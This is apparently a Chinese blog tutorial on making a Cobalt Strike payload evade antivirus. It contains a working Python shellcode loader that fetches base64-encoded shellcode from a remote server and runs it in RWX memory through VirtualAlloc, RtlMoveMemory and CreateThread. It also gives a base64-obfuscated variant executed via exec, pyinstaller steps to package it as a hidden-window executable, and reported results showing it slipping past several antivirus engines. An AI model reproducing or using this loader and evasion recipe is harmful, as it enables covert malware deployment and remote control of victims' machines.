CS分离免杀实战
- 一、原理简述
- 二、环境配置
- 三、本地测试
-
-
- 1.生成shellcode
- 2.代码变形
- 3.pyinstaller打包
- 4.免杀测试
-
本次实践参考小刚师傅的教程,详细原理请看原文: https://mp.weixin.qq.com/
一、原理简述
通过
python requests
远程下载经过
base64
编码后的
shellcode
和
loader
,然后解码通过exec函数先执行
loader
,通过
loader
加载
shellcode
,最终达到CS上线目的。
二、环境配置
- python2.7
- pyinstaller 3.0.0
- win10
为了防止不同版本出现的幺蛾子,在此供上我的python安装包。
链接:https://pan.baidu.com/s/1ek3LYU8xqqjfQdqqt-dF8g
提取码:1v27
三、本地测试
1.生成shellcode
保留payload.c中的双引号部分内容,并将\x换为空,得到以fc开头的一串字符。之后将其base64编码放进服务器
https://xxxxxxxx/1.txt
备用。
2.代码变形
加载器源码如下:
import ctypes
import requests
import base64
#下载shellcode
scode = requests.get ("https://xxxxxxxx/1.txt")
# 解码转换为字节类型文件
shellcode = bytearray (base64.b64decode (scode.text).decode ('hex'))
# VirtualAlloc申请内存,并使用restype函数设置VirtualAlloc返回类型为ctypes.c_unit64(系统位数)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# LPVOID VirtualAlloc{LPVOID lpAddress, #要分配的内存区域的地址
# DWORD dwSize, #分配的大小
# DWORD flAllocationType, #分配的类型
# DWORD flProtect #该内存的初始保护属性
# };
ptr = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0),
ctypes.c_int (len (shellcode)),
ctypes.c_int (0x3000),
ctypes.c_int (0x40))
# 确定shellcode的大小
buf = (ctypes.c_char * len (shellcode)).from_buffer (shellcode)
# 从指定内存地址将内容复制到申请的内存中去
ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_int (ptr),
buf,
ctypes.c_int (len (shellcode)))
# 创建线程
handle = ctypes.windll.kernel32.CreateThread (ctypes.c_int (0),
ctypes.c_int (0),
ctypes.c_uint64 (ptr),
ctypes.c_int (0),
ctypes.c_int (0),
ctypes.pointer (ctypes.c_int (0)))
# 调用WaitForSingleObject函数用来检测线程的状态
ctypes.windll.kernel32.WaitForSingleObject (ctypes.c_int (handle), ctypes.c_int (-1))
变形后如下:
import ctypes
import requests
import base64
if __name__ == '__main__':
scode = '''fc4883e................'''
shellcode = bytearray (scode.decode('hex'))
loader = '''Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NDtwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSxjdHlwZXMuY19pbnQoMHgzMDAwKSxjdHlwZXMuY19pbnQoMHg0MCkpO2J1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKTtoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX3VpbnQ2NChwdHIpLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkp'''
exec (base64.b64decode(loader))
由于考虑到网络原因和python编码问题(request下载按照的是unicode编码,直接decode(‘hex’)要报错,可能和版本也有关系),可能有幺蛾子,所以就把shellcode和loader放在代码里了。
3.pyinstaller打包
需要事先装几个模块
python -m pip install requests
python -m pip install pyinstaller==3.0
python -m pip install pypiwin32
如果网速太慢的话就用国内的镜像,后面加几个命令,例如:
python -m pip install pypiwin32 -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
之后打包:
pyinstaller -F local-anti.py -i Favicon.ico -w
关于
pyinstaller
这几个打包的参数说明如下:
在dist目录下生成
local-anti.exe
,运行成功上线:
4.免杀测试
360:
火绒:
微步沙箱:
看下来只有微软引擎报毒,看来还可以。